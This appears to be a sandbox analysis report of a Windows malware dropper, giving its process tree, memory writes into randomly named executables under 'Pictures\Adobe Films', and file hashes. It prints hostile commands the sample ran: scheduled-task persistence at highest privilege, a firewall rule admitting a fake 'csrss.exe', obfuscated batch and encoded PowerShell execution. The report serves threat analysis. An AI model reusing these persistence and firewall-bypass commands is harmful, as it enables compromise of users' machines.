PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2fc

C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

"C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe"

C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe

"C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe"

C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

"C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe"

C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"

C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"

C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

"C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe"

C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

"C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe"

C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

"C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe"

C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe

"C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe"

C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe

"C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -?

C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe

"C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe"

C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe

"C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe"

C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe

"C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe"

C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Inebriarti.htm & ping -n 5 localhost

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe

"C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe"

C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe

"C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tal.exe.pif

Tal.exe.pif H

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220705110445.log C:\Windows\Logs\CBS\CbsPersist_20220705110445.cab

C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"

Network


Files

memory/2024-54-0x0000000076011000-0x0000000076013000-memory.dmp

memory/2024-55-0x0000000000230000-0x000000000032A000-memory.dmp

memory/1440-57-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-58-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-60-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-62-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-63-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-65-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-68-0x0000000000414420-mapping.dmp

memory/1440-69-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-73-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-77-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-79-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-80-0x0000000003EE0000-0x0000000004163000-memory.dmp

memory/1440-81-0x0000000003EE0000-0x0000000004163000-memory.dmp

memory/1708-82-0x000007FEFC061000-0x000007FEFC063000-memory.dmp

\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA1 e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1

memory/1080-84-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

MD5 9b51aacc658896de78bbe14567334f2f
SHA1 72edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256 f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA512 82b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429

\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

MD5 9b51aacc658896de78bbe14567334f2f
SHA1 72edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256 f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA512 82b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429

memory/840-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA1 e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1

\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

MD5 f8d8b67dfcec2684e96122cb9aea4daf
SHA1 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA512 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6

memory/1068-95-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

MD5 9b51aacc658896de78bbe14567334f2f
SHA1 72edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256 f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA512 82b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429

\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe

MD5 22922137714e5791617bc3c9710615b6
SHA1 78cff80d5ab75b845272c728429446f0807b5ad4
SHA256 f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
SHA512 ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00

\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe

MD5 22922137714e5791617bc3c9710615b6
SHA1 78cff80d5ab75b845272c728429446f0807b5ad4
SHA256 f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
SHA512 ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00

memory/2000-92-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

MD5 f8d8b67dfcec2684e96122cb9aea4daf
SHA1 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA512 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6

memory/1440-120-0x0000000006DB0000-0x0000000007646000-memory.dmp

\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe

MD5 45abb1bedf83daf1f2ebbac86e2fa151
SHA1 7d9ccba675478ab65707a28fd277a189450fc477
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

MD5 0526c3f2c76e9f5d19fa2a1267fae065
SHA1 fe89bf1569ca378fbdf27bcf53cf5daf26696e2f
SHA256 25fccde6303108b00272a40405566706292291ebb62a670efe65ad6dad6ca66a
SHA512 49d15c5397fe690860ff7fac6d18675fd9e990cd635c7c6b371ac9cd5c2d3e1ee822d771e4b7875b5424244bae4b7004460cc027ea8831271de6d95e04d0cb78

\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

MD5 0b0a2a87f1c3baf76f3929078c0a1661
SHA1 c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA256 89ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
